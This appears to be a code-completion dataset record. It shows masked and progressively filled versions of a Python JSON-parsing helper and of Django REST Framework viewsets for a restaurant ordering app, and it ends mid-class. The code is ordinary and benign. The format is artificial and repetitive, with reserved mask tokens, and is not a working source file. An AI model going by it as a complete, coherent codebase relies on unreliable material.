\"\"\"\n\n self.stabilize()\n if not self.canceled:\n fsm.handle('done')\n\n\n def _cancel(self):\n self.canceled = True\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def from_json_string(my_str):
"""Function returns a JSON file representation of an object (string)"""
return json.loads(my_str)
<|reserved_special_token_1|>
import json
def from_json_string(my_str):
"""Function returns a JSON file representation of an object (string)"""
return json.loads(my_str)
<|reserved_special_token_1|>
#!/usr/bin/python3
import json
def from_json_string(my_str):
    """Deserialize *my_str*, a JSON document, into a Python object."""
    decoded = json.loads(my_str)
    return decoded
|
flexible
|
{
"blob_id": "b748c489b2c63546feada811aa3b66146ad8d28e",
"index": 9450,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef from_json_string(my_str):\n \"\"\"Function returns a JSON file representation of an object (string)\"\"\"\n return json.loads(my_str)\n",
"step-3": "import json\n\n\ndef from_json_string(my_str):\n \"\"\"Function returns a JSON file representation of an object (string)\"\"\"\n return json.loads(my_str)\n",
"step-4": "#!/usr/bin/python3\nimport json\n\n\ndef from_json_string(my_str):\n \"\"\"Function returns a JSON file representation of an object (string)\"\"\"\n\n return json.loads(my_str)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class RestaurantViewSet(ModelViewSet):
    """CRUD plus discovery endpoints (home feed, offers, menus) for restaurants.

    Anonymous users get read-only access; authenticated users may write.
    """

    serializer_class = RestaurantSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Restaurant.objects.all()

    def _get_recommended_restaurants(self):
        """Return all restaurants annotated with their average star rating.

        The previous ``-> queryset`` return annotation referenced the
        class-level QuerySet *instance* rather than a type, so it was removed.
        """
        return self.get_queryset().annotate(rates_avg=Avg('rates__stars'))

    def _get_special_restaurants(self):
        """Return restaurants that have a discounted menu or are flagged as
        being on a special day."""
        return self.get_queryset().filter(
            Q(menus__discount__gt=0) | Q(on_special_day=True))

    @action(['get'], detail=False, url_path='get-home')
    def home(self, request, *args, **kwargs):
        """Home feed: 5 random recommended, special, and plain restaurants."""
        # order_by('?') draws a random sample; the slice bounds the payload.
        recommended = self._get_recommended_restaurants().order_by('?')[:5]
        special = self._get_special_restaurants().order_by('?')[:5]
        all_restaurants = self.get_queryset().order_by('?')[:5]
        response = {
            'recommended': self.get_serializer(recommended, many=True).data,
            'special': self.get_serializer(special, many=True).data,
            'all': self.get_serializer(all_restaurants, many=True).data,
        }
        return Response(response)

    @action(['get'], detail=False, url_path='special-offers')
    def special_offers(self, request, *args, **kwargs):
        """All restaurants with current offers, newest first."""
        serializer = self.get_serializer(
            self._get_special_restaurants().order_by('-created_at'), many=True)
        return Response(serializer.data)

    @action(['get'], detail=False, url_path='recommended-offers')
    def recommended_offers(self, request, *args, **kwargs):
        """All restaurants ordered by average rating, best first."""
        serializer = self.get_serializer(
            self._get_recommended_restaurants().order_by('-rates_avg'),
            many=True)
        return Response(serializer.data)

    @action(['get'], detail=True, url_path='restaurant-menus')
    def get_restaurant_menus(self, request, *args, **kwargs):
        """Menus of the given restaurant, grouped by meal type."""
        categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(
            restaurant_id=self.kwargs.get('pk'))
        return Response(categorized_menus)
class MenuViewSet(ModelViewSet):
    """CRUD plus discovery endpoints (home feed, offers) for menus."""

    serializer_class = MenuSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Menu.objects.all()

    @action(['get'], detail=False, url_path='get-home')
    def home(self, request, *args, **kwargs):
        """Home feed: 5 random discounted menus and 5 random menus overall."""
        qs = self.get_queryset()
        # order_by('?') draws a random sample; the slice bounds the payload.
        discounted = qs.filter(~Q(discount=0)).order_by('?')[:5]
        picks = qs.all().order_by('?')[:5]
        payload = {
            'recommended': self.get_serializer(picks, many=True).data,
            'special_offers': self.get_serializer(discounted, many=True).data,
        }
        return Response(data=payload)

    @action(['get'], detail=False, url_path='special-offers')
    def special_offers(self, request, *args, **kwargs):
        """Every discounted menu, newest first."""
        discounted = self.get_queryset().filter(
            ~Q(discount=0)).order_by('-created_at')
        return Response(self.get_serializer(discounted, many=True).data)

    @action(['get'], detail=False, url_path='recommended-offers')
    def recommended_offers(self, request, *args, **kwargs):
        """All menus, newest first."""
        menus = self.get_queryset().all().order_by('-created_at')
        return Response(self.get_serializer(menus, many=True).data)
class OrderViewSet(ModelViewSet):
    """Endpoints for the authenticated client's orders."""

    serializer_class = OrderWRestaurantSerializer
    permission_classes = [permissions.IsAuthenticated]
    queryset = Order.objects.all().order_by('-created_at')

    def get_serializer(self, *args, **kwargs):
        # Creation uses the plain write serializer; reads embed the
        # restaurant via OrderWRestaurantSerializer.
        if self.action == 'create':
            # Bug fix: OrderSerializer was built without the DRF context
            # (request/view/format), unlike MealTypeViewSet; request-dependent
            # serializer fields break without it.
            kwargs.setdefault('context', self.get_serializer_context())
            return OrderSerializer(*args, **kwargs)
        return super(OrderViewSet, self).get_serializer(*args, **kwargs)

    def get_queryset(self):
        """Limit orders to those owned by the requesting client."""
        return super(OrderViewSet, self).get_queryset().filter(
            client=self.request.user.client)

    def create(self, request, *args, **kwargs):
        # Normalize the incoming payload before the standard create flow.
        fixer = RequestDataFixer(request=request)
        return super(OrderViewSet, self).create(fixer, *args, **kwargs)
class OrderLineViewSet(ModelViewSet):
    """Plain CRUD endpoints for individual order lines."""

    queryset = OrderLine.objects.all()
    serializer_class = OrderLineSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
class WilayaViewSet(ModelViewSet):
    """CRUD for wilayas; only admins may write, everyone may read."""

    queryset = Wilaya.objects.all()
    serializer_class = WilayaSerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
class CityViewSet(ModelViewSet):
    """CRUD for cities; only admins may write, everyone may read."""

    queryset = City.objects.all()
    serializer_class = CitySerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
<|reserved_special_token_0|>
class AddressViewSet(ModelViewSet):
    """CRUD for the requesting client's addresses, plus default management."""

    serializer_class = AddressSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Address.objects.all()

    @action(['PUT'], detail=True, url_path='set-default', url_name=
        'set-default')
    def set_default(self, request, *args, **kwargs):
        """Mark this address as the default and unmark the client's others."""
        address = self.get_object()
        address.default = True
        address.save()
        siblings = self.get_queryset().filter(
            ~Q(pk=address.pk), belongs_to=request.user.client)
        siblings.update(default=False)
        return Response(self.get_serializer(address).data)

    @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
    def set_main(self, request, *args, **kwargs):
        """Clear the default flag on every address of the client."""
        self.get_queryset().filter(
            belongs_to=request.user.client).update(default=False)
        return Response({'status': True})

    def get_queryset(self):
        """Limit addresses to those owned by the requesting client."""
        base = super(AddressViewSet, self).get_queryset()
        return base.filter(belongs_to=self.request.user.client)
class PhoneViewSet(ModelViewSet):
    """CRUD for the authenticated user's phone numbers plus default management."""
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    serializer_class = PhoneSerializer
    queryset = Phone.objects.all()

    @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
    def set_main(self, request, *args, **kwargs):
        """Clear the default flag on every phone owned by the user."""
        self.get_queryset().filter(user=request.user).update(default=False)
        return Response({'status': True})

    @action(['PUT'], detail=True, url_path='set-default', url_name='set-default')
    def set_default(self, request, *args, **kwargs):
        """Mark this phone as the default and unset the user's other phones."""
        instance = self.get_object()
        instance.default = True
        instance.save()
        self.get_queryset().filter(~Q(pk=instance.pk),
                                   user=request.user).update(default=False)
        return Response(self.get_serializer(instance).data)

    def get_queryset(self):
        # BUG FIX: the original called self.get_queryset() here, recursing
        # forever (RecursionError on any request). Delegate to the parent's
        # queryset, then restrict to the requesting user's phones.
        return super(PhoneViewSet, self).get_queryset().filter(user=self.request.user)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MealTypeViewSet(ModelViewSet):
    """Meal types, with an endpoint listing a restaurant's types with menus."""
    permission_classes = [my_perms.IsAdminOrReadOnly]
    serializer_class = MealTypeSerializer
    queryset = MealType.objects.all()

    def get_serializer(self, *args, **kwargs):
        # The grouped endpoint needs the serializer that nests menus.
        if self.action != 'get_types_with_menus':
            return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)
        kwargs['context'] = self.get_serializer_context()
        return MealTypesWithMenuSerializer(*args, **kwargs)

    @action(['get'], detail=False, url_path='type-with-menus')
    def get_types_with_menus(self, request, *args, **kwargs):
        """Meal types having menus offered by ?restaurant=<id> (0 if absent)."""
        restaurant_id = request.query_params.get('restaurant', 0)
        matching = self.get_queryset().filter(menus__offered_by=restaurant_id)
        return Response(self.get_serializer(matching, many=True).data)
class RestaurantTypeViewSet(ModelViewSet):
    """Plain CRUD over restaurant types; writes restricted to admins."""
    queryset = RestaurantType.objects.all()
    serializer_class = RestaurantTypeSerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
class RestaurantViewSet(ModelViewSet):
    """Restaurants plus home / recommended / special-offer listings."""
    serializer_class = RestaurantSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Restaurant.objects.all()

    def _get_recommended_restaurants(self):
        """All restaurants annotated with their average star rating (rates_avg)."""
        # NOTE: dropped the original's bogus `-> queryset` annotation, which
        # pointed at the class-attribute queryset instance, not a type.
        return self.get_queryset().annotate(rates_avg=Avg('rates__stars'))

    def _get_special_restaurants(self):
        """Restaurants with a discounted menu or an active special day.

        BUG FIX: filtering across the multi-valued ``menus`` relation yields
        one row per matching menu, so the original returned duplicate
        restaurants; ``distinct()`` collapses them.
        """
        special = self.get_queryset().filter(
            Q(menus__discount__gt=0) | Q(on_special_day=True))
        return special.distinct()

    @action(['get'], detail=False, url_path='get-home')
    def home(self, request, *args, **kwargs):
        """Five random picks from each of: recommended, special, all."""
        recommended = self._get_recommended_restaurants().order_by('?')[:5]
        special = self._get_special_restaurants().order_by('?')[:5]
        everything = self.get_queryset().order_by('?')[:5]
        return Response({
            'recommended': self.get_serializer(recommended, many=True).data,
            'special': self.get_serializer(special, many=True).data,
            'all': self.get_serializer(everything, many=True).data,
        })

    @action(['get'], detail=False, url_path='special-offers')
    def special_offers(self, request, *args, **kwargs):
        """Special-offer restaurants, newest first."""
        qs = self._get_special_restaurants().order_by('-created_at')
        return Response(self.get_serializer(qs, many=True).data)

    @action(['get'], detail=False, url_path='recommended-offers')
    def recommended_offers(self, request, *args, **kwargs):
        """Restaurants ordered by average rating, best first."""
        qs = self._get_recommended_restaurants().order_by('-rates_avg')
        return Response(self.get_serializer(qs, many=True).data)

    @action(['get'], detail=True, url_path='restaurant-menus')
    def get_restaurant_menus(self, request, *args, **kwargs):
        """This restaurant's menus grouped by meal type."""
        grouped = Menu.objects.grouped_by_meal_type_for_a_restaurant(
            restaurant_id=self.kwargs.get('pk'))
        return Response(grouped)
class MenuViewSet(ModelViewSet):
    """Menus plus home / special / recommended listings."""
    serializer_class = MenuSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Menu.objects.all()

    @action(['get'], detail=False, url_path='get-home')
    def home(self, request, *args, **kwargs):
        """Five random discounted menus and five random menus overall."""
        qs = self.get_queryset()
        discounted = qs.filter(~Q(discount=0)).order_by('?')[:5]
        picks = qs.all().order_by('?')[:5]
        payload = {
            'recommended': self.get_serializer(picks, many=True).data,
            'special_offers': self.get_serializer(discounted, many=True).data,
        }
        return Response(data=payload)

    @action(['get'], detail=False, url_path='special-offers')
    def special_offers(self, request, *args, **kwargs):
        """Discounted menus, newest first."""
        discounted = self.get_queryset().filter(~Q(discount=0)).order_by('-created_at')
        return Response(self.get_serializer(discounted, many=True).data)

    @action(['get'], detail=False, url_path='recommended-offers')
    def recommended_offers(self, request, *args, **kwargs):
        """All menus, newest first."""
        newest = self.get_queryset().all().order_by('-created_at')
        return Response(self.get_serializer(newest, many=True).data)
class OrderViewSet(ModelViewSet):
    """Orders of the authenticated client, newest first."""
    serializer_class = OrderWRestaurantSerializer
    permission_classes = [permissions.IsAuthenticated]
    queryset = Order.objects.all().order_by('-created_at')

    def get_serializer(self, *args, **kwargs):
        # Creation takes the plain serializer; reads embed restaurant data.
        if self.action == 'create':
            return OrderSerializer(*args, **kwargs)
        return super(OrderViewSet, self).get_serializer(*args, **kwargs)

    def get_queryset(self):
        # Only the requesting client's own orders.
        base = super(OrderViewSet, self).get_queryset()
        return base.filter(client=self.request.user.client)

    def create(self, request, *args, **kwargs):
        # Normalize the incoming payload before delegating to DRF's create.
        fixed = RequestDataFixer(request=request)
        return super(OrderViewSet, self).create(fixed, *args, **kwargs)
class OrderLineViewSet(ModelViewSet):
    """Plain CRUD over individual order lines."""
    queryset = OrderLine.objects.all()
    serializer_class = OrderLineSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
class WilayaViewSet(ModelViewSet):
    """Plain CRUD over wilayas; writes restricted to admins."""
    queryset = Wilaya.objects.all()
    serializer_class = WilayaSerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
class CityViewSet(ModelViewSet):
    """Plain CRUD over cities; writes restricted to admins."""
    queryset = City.objects.all()
    serializer_class = CitySerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
<|reserved_special_token_0|>
class AddressViewSet(ModelViewSet):
    """CRUD for the authenticated client's addresses plus default management."""
    serializer_class = AddressSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Address.objects.all()

    @action(['PUT'], detail=True, url_path='set-default', url_name='set-default')
    def set_default(self, request, *args, **kwargs):
        """Flag this address as the default and unset the client's others."""
        address = self.get_object()
        address.default = True
        address.save()
        others = self.get_queryset().filter(~Q(pk=address.pk),
                                            belongs_to=request.user.client)
        others.update(default=False)
        return Response(self.get_serializer(address).data)

    @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
    def set_main(self, request, *args, **kwargs):
        """Clear the default flag on every address owned by the client."""
        self.get_queryset().filter(belongs_to=request.user.client).update(default=False)
        return Response({'status': True})

    def get_queryset(self):
        # Restrict to the requesting client's own addresses.
        base = super(AddressViewSet, self).get_queryset()
        return base.filter(belongs_to=self.request.user.client)
class PhoneViewSet(ModelViewSet):
    """CRUD for the authenticated user's phone numbers plus default management."""
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    serializer_class = PhoneSerializer
    queryset = Phone.objects.all()

    @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
    def set_main(self, request, *args, **kwargs):
        """Clear the default flag on every phone owned by the user."""
        self.get_queryset().filter(user=request.user).update(default=False)
        return Response({'status': True})

    @action(['PUT'], detail=True, url_path='set-default', url_name='set-default')
    def set_default(self, request, *args, **kwargs):
        """Mark this phone as the default and unset the user's other phones."""
        instance = self.get_object()
        instance.default = True
        instance.save()
        self.get_queryset().filter(~Q(pk=instance.pk),
                                   user=request.user).update(default=False)
        return Response(self.get_serializer(instance).data)

    def get_queryset(self):
        # BUG FIX: the original called self.get_queryset() here, recursing
        # forever (RecursionError on any request). Delegate to the parent's
        # queryset, then restrict to the requesting user's phones.
        return super(PhoneViewSet, self).get_queryset().filter(user=self.request.user)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CuisineViewSet(ModelViewSet):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class MealTypeViewSet(ModelViewSet):
    """Meal types, with an endpoint listing a restaurant's types with menus."""
    permission_classes = [my_perms.IsAdminOrReadOnly]
    serializer_class = MealTypeSerializer
    queryset = MealType.objects.all()

    def get_serializer(self, *args, **kwargs):
        # The grouped endpoint needs the serializer that nests menus.
        if self.action != 'get_types_with_menus':
            return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)
        kwargs['context'] = self.get_serializer_context()
        return MealTypesWithMenuSerializer(*args, **kwargs)

    @action(['get'], detail=False, url_path='type-with-menus')
    def get_types_with_menus(self, request, *args, **kwargs):
        """Meal types having menus offered by ?restaurant=<id> (0 if absent)."""
        restaurant_id = request.query_params.get('restaurant', 0)
        matching = self.get_queryset().filter(menus__offered_by=restaurant_id)
        return Response(self.get_serializer(matching, many=True).data)
class RestaurantTypeViewSet(ModelViewSet):
    """Plain CRUD over restaurant types; writes restricted to admins."""
    queryset = RestaurantType.objects.all()
    serializer_class = RestaurantTypeSerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
class RestaurantViewSet(ModelViewSet):
    """Restaurants plus home / recommended / special-offer listings."""
    serializer_class = RestaurantSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Restaurant.objects.all()

    def _get_recommended_restaurants(self):
        """All restaurants annotated with their average star rating (rates_avg)."""
        # NOTE: dropped the original's bogus `-> queryset` annotation, which
        # pointed at the class-attribute queryset instance, not a type.
        return self.get_queryset().annotate(rates_avg=Avg('rates__stars'))

    def _get_special_restaurants(self):
        """Restaurants with a discounted menu or an active special day.

        BUG FIX: filtering across the multi-valued ``menus`` relation yields
        one row per matching menu, so the original returned duplicate
        restaurants; ``distinct()`` collapses them.
        """
        special = self.get_queryset().filter(
            Q(menus__discount__gt=0) | Q(on_special_day=True))
        return special.distinct()

    @action(['get'], detail=False, url_path='get-home')
    def home(self, request, *args, **kwargs):
        """Five random picks from each of: recommended, special, all."""
        recommended = self._get_recommended_restaurants().order_by('?')[:5]
        special = self._get_special_restaurants().order_by('?')[:5]
        everything = self.get_queryset().order_by('?')[:5]
        return Response({
            'recommended': self.get_serializer(recommended, many=True).data,
            'special': self.get_serializer(special, many=True).data,
            'all': self.get_serializer(everything, many=True).data,
        })

    @action(['get'], detail=False, url_path='special-offers')
    def special_offers(self, request, *args, **kwargs):
        """Special-offer restaurants, newest first."""
        qs = self._get_special_restaurants().order_by('-created_at')
        return Response(self.get_serializer(qs, many=True).data)

    @action(['get'], detail=False, url_path='recommended-offers')
    def recommended_offers(self, request, *args, **kwargs):
        """Restaurants ordered by average rating, best first."""
        qs = self._get_recommended_restaurants().order_by('-rates_avg')
        return Response(self.get_serializer(qs, many=True).data)

    @action(['get'], detail=True, url_path='restaurant-menus')
    def get_restaurant_menus(self, request, *args, **kwargs):
        """This restaurant's menus grouped by meal type."""
        grouped = Menu.objects.grouped_by_meal_type_for_a_restaurant(
            restaurant_id=self.kwargs.get('pk'))
        return Response(grouped)
class MenuViewSet(ModelViewSet):
    """Menus plus home / special / recommended listings."""
    serializer_class = MenuSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Menu.objects.all()

    @action(['get'], detail=False, url_path='get-home')
    def home(self, request, *args, **kwargs):
        """Five random discounted menus and five random menus overall."""
        qs = self.get_queryset()
        discounted = qs.filter(~Q(discount=0)).order_by('?')[:5]
        picks = qs.all().order_by('?')[:5]
        payload = {
            'recommended': self.get_serializer(picks, many=True).data,
            'special_offers': self.get_serializer(discounted, many=True).data,
        }
        return Response(data=payload)

    @action(['get'], detail=False, url_path='special-offers')
    def special_offers(self, request, *args, **kwargs):
        """Discounted menus, newest first."""
        discounted = self.get_queryset().filter(~Q(discount=0)).order_by('-created_at')
        return Response(self.get_serializer(discounted, many=True).data)

    @action(['get'], detail=False, url_path='recommended-offers')
    def recommended_offers(self, request, *args, **kwargs):
        """All menus, newest first."""
        newest = self.get_queryset().all().order_by('-created_at')
        return Response(self.get_serializer(newest, many=True).data)
class OrderViewSet(ModelViewSet):
    """Orders of the authenticated client, newest first."""
    serializer_class = OrderWRestaurantSerializer
    permission_classes = [permissions.IsAuthenticated]
    queryset = Order.objects.all().order_by('-created_at')

    def get_serializer(self, *args, **kwargs):
        # Creation takes the plain serializer; reads embed restaurant data.
        if self.action == 'create':
            return OrderSerializer(*args, **kwargs)
        return super(OrderViewSet, self).get_serializer(*args, **kwargs)

    def get_queryset(self):
        # Only the requesting client's own orders.
        base = super(OrderViewSet, self).get_queryset()
        return base.filter(client=self.request.user.client)

    def create(self, request, *args, **kwargs):
        # Normalize the incoming payload before delegating to DRF's create.
        fixed = RequestDataFixer(request=request)
        return super(OrderViewSet, self).create(fixed, *args, **kwargs)
class OrderLineViewSet(ModelViewSet):
    """Plain CRUD over individual order lines."""
    queryset = OrderLine.objects.all()
    serializer_class = OrderLineSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
class WilayaViewSet(ModelViewSet):
    """Plain CRUD over wilayas; writes restricted to admins."""
    queryset = Wilaya.objects.all()
    serializer_class = WilayaSerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
class CityViewSet(ModelViewSet):
    """Plain CRUD over cities; writes restricted to admins."""
    queryset = City.objects.all()
    serializer_class = CitySerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
<|reserved_special_token_0|>
class AddressViewSet(ModelViewSet):
    """CRUD for the authenticated client's addresses plus default management."""
    serializer_class = AddressSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Address.objects.all()

    @action(['PUT'], detail=True, url_path='set-default', url_name='set-default')
    def set_default(self, request, *args, **kwargs):
        """Flag this address as the default and unset the client's others."""
        address = self.get_object()
        address.default = True
        address.save()
        others = self.get_queryset().filter(~Q(pk=address.pk),
                                            belongs_to=request.user.client)
        others.update(default=False)
        return Response(self.get_serializer(address).data)

    @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
    def set_main(self, request, *args, **kwargs):
        """Clear the default flag on every address owned by the client."""
        self.get_queryset().filter(belongs_to=request.user.client).update(default=False)
        return Response({'status': True})

    def get_queryset(self):
        # Restrict to the requesting client's own addresses.
        base = super(AddressViewSet, self).get_queryset()
        return base.filter(belongs_to=self.request.user.client)
class PhoneViewSet(ModelViewSet):
    """CRUD for the authenticated user's phone numbers plus default management."""
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    serializer_class = PhoneSerializer
    queryset = Phone.objects.all()

    @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
    def set_main(self, request, *args, **kwargs):
        """Clear the default flag on every phone owned by the user."""
        self.get_queryset().filter(user=request.user).update(default=False)
        return Response({'status': True})

    @action(['PUT'], detail=True, url_path='set-default', url_name='set-default')
    def set_default(self, request, *args, **kwargs):
        """Mark this phone as the default and unset the user's other phones."""
        instance = self.get_object()
        instance.default = True
        instance.save()
        self.get_queryset().filter(~Q(pk=instance.pk),
                                   user=request.user).update(default=False)
        return Response(self.get_serializer(instance).data)

    def get_queryset(self):
        # BUG FIX: the original called self.get_queryset() here, recursing
        # forever (RecursionError on any request). Delegate to the parent's
        # queryset, then restrict to the requesting user's phones.
        return super(PhoneViewSet, self).get_queryset().filter(user=self.request.user)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CuisineViewSet(ModelViewSet):
    """Plain CRUD over cuisines; writes restricted to admins."""
    queryset = Cuisine.objects.all()
    serializer_class = CuisineSerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
class MealTypeViewSet(ModelViewSet):
    """Meal types, with an endpoint listing a restaurant's types with menus."""
    permission_classes = [my_perms.IsAdminOrReadOnly]
    serializer_class = MealTypeSerializer
    queryset = MealType.objects.all()

    def get_serializer(self, *args, **kwargs):
        # The grouped endpoint needs the serializer that nests menus.
        if self.action != 'get_types_with_menus':
            return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)
        kwargs['context'] = self.get_serializer_context()
        return MealTypesWithMenuSerializer(*args, **kwargs)

    @action(['get'], detail=False, url_path='type-with-menus')
    def get_types_with_menus(self, request, *args, **kwargs):
        """Meal types having menus offered by ?restaurant=<id> (0 if absent)."""
        restaurant_id = request.query_params.get('restaurant', 0)
        matching = self.get_queryset().filter(menus__offered_by=restaurant_id)
        return Response(self.get_serializer(matching, many=True).data)
class RestaurantTypeViewSet(ModelViewSet):
    """Plain CRUD over restaurant types; writes restricted to admins."""
    queryset = RestaurantType.objects.all()
    serializer_class = RestaurantTypeSerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
class RestaurantViewSet(ModelViewSet):
    """Restaurants plus home / recommended / special-offer listings."""
    serializer_class = RestaurantSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Restaurant.objects.all()

    def _get_recommended_restaurants(self):
        """All restaurants annotated with their average star rating (rates_avg)."""
        # NOTE: dropped the original's bogus `-> queryset` annotation, which
        # pointed at the class-attribute queryset instance, not a type.
        return self.get_queryset().annotate(rates_avg=Avg('rates__stars'))

    def _get_special_restaurants(self):
        """Restaurants with a discounted menu or an active special day.

        BUG FIX: filtering across the multi-valued ``menus`` relation yields
        one row per matching menu, so the original returned duplicate
        restaurants; ``distinct()`` collapses them.
        """
        special = self.get_queryset().filter(
            Q(menus__discount__gt=0) | Q(on_special_day=True))
        return special.distinct()

    @action(['get'], detail=False, url_path='get-home')
    def home(self, request, *args, **kwargs):
        """Five random picks from each of: recommended, special, all."""
        recommended = self._get_recommended_restaurants().order_by('?')[:5]
        special = self._get_special_restaurants().order_by('?')[:5]
        everything = self.get_queryset().order_by('?')[:5]
        return Response({
            'recommended': self.get_serializer(recommended, many=True).data,
            'special': self.get_serializer(special, many=True).data,
            'all': self.get_serializer(everything, many=True).data,
        })

    @action(['get'], detail=False, url_path='special-offers')
    def special_offers(self, request, *args, **kwargs):
        """Special-offer restaurants, newest first."""
        qs = self._get_special_restaurants().order_by('-created_at')
        return Response(self.get_serializer(qs, many=True).data)

    @action(['get'], detail=False, url_path='recommended-offers')
    def recommended_offers(self, request, *args, **kwargs):
        """Restaurants ordered by average rating, best first."""
        qs = self._get_recommended_restaurants().order_by('-rates_avg')
        return Response(self.get_serializer(qs, many=True).data)

    @action(['get'], detail=True, url_path='restaurant-menus')
    def get_restaurant_menus(self, request, *args, **kwargs):
        """This restaurant's menus grouped by meal type."""
        grouped = Menu.objects.grouped_by_meal_type_for_a_restaurant(
            restaurant_id=self.kwargs.get('pk'))
        return Response(grouped)
class MenuViewSet(ModelViewSet):
    """Menus plus home / special / recommended listings."""
    serializer_class = MenuSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Menu.objects.all()

    @action(['get'], detail=False, url_path='get-home')
    def home(self, request, *args, **kwargs):
        """Five random discounted menus and five random menus overall."""
        qs = self.get_queryset()
        discounted = qs.filter(~Q(discount=0)).order_by('?')[:5]
        picks = qs.all().order_by('?')[:5]
        payload = {
            'recommended': self.get_serializer(picks, many=True).data,
            'special_offers': self.get_serializer(discounted, many=True).data,
        }
        return Response(data=payload)

    @action(['get'], detail=False, url_path='special-offers')
    def special_offers(self, request, *args, **kwargs):
        """Discounted menus, newest first."""
        discounted = self.get_queryset().filter(~Q(discount=0)).order_by('-created_at')
        return Response(self.get_serializer(discounted, many=True).data)

    @action(['get'], detail=False, url_path='recommended-offers')
    def recommended_offers(self, request, *args, **kwargs):
        """All menus, newest first."""
        newest = self.get_queryset().all().order_by('-created_at')
        return Response(self.get_serializer(newest, many=True).data)
class OrderViewSet(ModelViewSet):
    """Orders of the authenticated client, newest first."""
    serializer_class = OrderWRestaurantSerializer
    permission_classes = [permissions.IsAuthenticated]
    queryset = Order.objects.all().order_by('-created_at')

    def get_serializer(self, *args, **kwargs):
        # Creation takes the plain serializer; reads embed restaurant data.
        if self.action == 'create':
            return OrderSerializer(*args, **kwargs)
        return super(OrderViewSet, self).get_serializer(*args, **kwargs)

    def get_queryset(self):
        # Only the requesting client's own orders.
        base = super(OrderViewSet, self).get_queryset()
        return base.filter(client=self.request.user.client)

    def create(self, request, *args, **kwargs):
        # Normalize the incoming payload before delegating to DRF's create.
        fixed = RequestDataFixer(request=request)
        return super(OrderViewSet, self).create(fixed, *args, **kwargs)
class OrderLineViewSet(ModelViewSet):
    """Plain CRUD over individual order lines."""
    queryset = OrderLine.objects.all()
    serializer_class = OrderLineSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
class WilayaViewSet(ModelViewSet):
    """Plain CRUD over wilayas; writes restricted to admins."""
    queryset = Wilaya.objects.all()
    serializer_class = WilayaSerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
class CityViewSet(ModelViewSet):
    """Plain CRUD over cities; writes restricted to admins."""
    queryset = City.objects.all()
    serializer_class = CitySerializer
    permission_classes = [my_perms.IsAdminOrReadOnly]
<|reserved_special_token_0|>
class AddressViewSet(ModelViewSet):
    """CRUD for the authenticated client's addresses plus default management."""
    serializer_class = AddressSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    queryset = Address.objects.all()

    @action(['PUT'], detail=True, url_path='set-default', url_name='set-default')
    def set_default(self, request, *args, **kwargs):
        """Flag this address as the default and unset the client's others."""
        address = self.get_object()
        address.default = True
        address.save()
        others = self.get_queryset().filter(~Q(pk=address.pk),
                                            belongs_to=request.user.client)
        others.update(default=False)
        return Response(self.get_serializer(address).data)

    @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
    def set_main(self, request, *args, **kwargs):
        """Clear the default flag on every address owned by the client."""
        self.get_queryset().filter(belongs_to=request.user.client).update(default=False)
        return Response({'status': True})

    def get_queryset(self):
        # Restrict to the requesting client's own addresses.
        base = super(AddressViewSet, self).get_queryset()
        return base.filter(belongs_to=self.request.user.client)
class PhoneViewSet(ModelViewSet):
    """CRUD for the authenticated user's phone numbers plus default management."""
    permission_classes = [permissions.IsAuthenticatedOrReadOnly]
    serializer_class = PhoneSerializer
    queryset = Phone.objects.all()

    @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')
    def set_main(self, request, *args, **kwargs):
        """Clear the default flag on every phone owned by the user."""
        self.get_queryset().filter(user=request.user).update(default=False)
        return Response({'status': True})

    @action(['PUT'], detail=True, url_path='set-default', url_name='set-default')
